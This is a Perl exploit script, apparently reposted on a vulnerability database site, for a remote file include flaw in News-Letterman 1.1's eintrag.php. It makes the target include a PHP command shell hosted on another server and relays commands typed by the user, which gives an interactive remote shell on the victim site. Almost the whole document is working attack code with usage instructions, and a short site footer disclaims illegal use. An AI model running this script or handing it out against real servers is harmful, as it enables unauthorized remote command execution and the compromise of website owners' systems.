#!/usr/bin/perl # #News-Letterman 1.1 (eintrag.php) Remote File Include Exploit # #Download: http://www.weltennetz.de/download/letterman1.1.zip # #Vulnerable Code: include ($sqllog); # #Coded by bd0rk || SOH-Crew # #Usage: exploit.pl [target] [cmd shell] [shell variable] # #Greetings: str0ke, TheJT, seduce, Perle, CodeR # # use LWP::UserAgent; $Path = $ARGV[0]; $Pathtocmd = $ARGV[1]; $cmdv = $ARGV[2]; if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()} head(); while() { print \"[shell] $\"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$Path.\'eintrag.php?sqllog=\'.$Pathtocmd.\'?&\'.$cmdv.\'=\'.$cmd)or die \" Could Not connect \"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[ ]/[....]/; if (!$cmd) {print \" Please Enter a Command \"; $return =\"\";} elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/) {print \" Could Not Connect to cmd Host or Invalid Command Variable \";exit} elsif ($return =~/^<br./>.<b>Fatal.error/) {print \" Invalid Command or No Return \"} if($return =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[....]/[ ]/; print \" $finreturn \"; last; } else {print \"[shell] $\";}}}last; sub head() { print \" ============================================================================ \"; print \" *News-Letterman 1.1 (eintrag.php) Remote File Include Exploit* \"; print \"============================================================================ \"; } sub usage() { head(); print \" Usage: exploit.pl [target] [cmd shell location] [cmd shell variable] \"; print \" <Site> - Full path to News-Letterman ex: http://www.site.com/ \"; print \" <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \"; print \" <cmd variable> - Command variable used in php shell \"; print \"============================================================================ \"; print \" Bug Found by bd0rk \"; print \" www.soh-crew.it.tt \"; print \"============================================================================ \"; exit(); }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论